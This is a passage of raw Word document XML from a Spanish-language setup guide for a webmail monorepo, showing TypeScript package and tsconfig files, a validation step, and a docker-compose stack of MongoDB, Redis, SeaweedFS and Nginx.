        <w:t xml:space="preserve">  "version": "0.1.0",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  "type": "module",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  "main": "./dist/index.js",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  "types": "./dist/index.d.ts",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  "exports": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    ".": { "import": "./dist/index.js", "types": "./dist/index.d.ts" }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  },</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  "scripts": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    "build": "tsc",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    "dev": "tsc --watch",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    "typecheck": "tsc --noEmit"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  },</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  "devDependencies": { "typescript": "^5.7.0" }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">EOF</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># tsconfig base para todo el monorepo</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> tsconfig.base.json </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;&lt; 'EOF'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  "compilerOptions": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    "target": "ES2022",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    "module": "NodeNext",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    "moduleResolution": "NodeNext",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    "strict": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    "esModuleInterop": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    "skipLibCheck": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    "forceConsistentCasingInFileNames": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    "resolveJsonModule": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    "declaration": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    "declarationMap": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    "sourceMap": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">EOF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Criterio de validación:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ejecutar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm install</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sin errores y verificar que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm -r typecheck</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">funciona en los packages con TypeScript inicializado.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="176"/>
    <w:bookmarkStart w:id="177" w:name="docker-compose-base"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">11.1.2 Docker Compose Base</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El stack de infraestructura incluye MongoDB 7 para persistencia, Redis 7 para sesiones y caché, SeaweedFS para almacenamiento de adjuntos y Nginx como reverse proxy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># docker-compose.yml</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mongo</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mongo:7.0.16</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">container_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> webmail6_mongo</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MONGO_INITDB_ROOT_USERNAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> admin</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">MONGO_INITDB_ROOT_PASSWORD_FILE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /run/secrets/mongo_root_password</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KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mongo_root_password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mongo_data:/data/db</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ./init-mongo.js:/docker-entrypoint-initdb.d/init-mongo.js:ro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"27017:27017"</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"mongosh"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"--eval"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"db.adminCommand('ping')"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start_period</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 30s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webmail6_net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2G </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">reservations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512M </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">logging</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json-file</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">options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max-size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"10m"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">max-file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"3"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</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redis:7.4-alpine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webmail6_redis</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--appendonly yes --maxmemory 256mb --maxmemory-policy allkeys-lru</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redis_data:/data</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"6379:6379"</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"redis-cli"</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webmail6_net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512M </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">logging</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json-file</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">options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max-size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"10m"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">max-file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"3"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">seaweedfs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chrislusge/seaweedfs:3.80</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">container_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> webmail6_seaweed</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"server -s3 -dir=/data -volume.max=50"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seaweed_data:/data</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"8333:8333"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"9333:9333"</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"wget"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"-q"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"--spider"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"http://localhost:9333"</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webmail6_net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1G </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">logging</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json-file</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">options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max-size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"10m"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">max-file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"3"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>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nginx:1.27-alpine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webmail6_nginx</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KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"443:443"</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./nginx/nginx.conf:/etc/nginx/nginx.conf:ro</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ./nginx/conf.d:/etc/nginx/conf.d:ro</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> certbot_data:/etc/letsencrypt</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webmail6_net</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128M </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">logging</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json-file</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">options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max-size</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"10m"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">max-file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"3"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</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w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
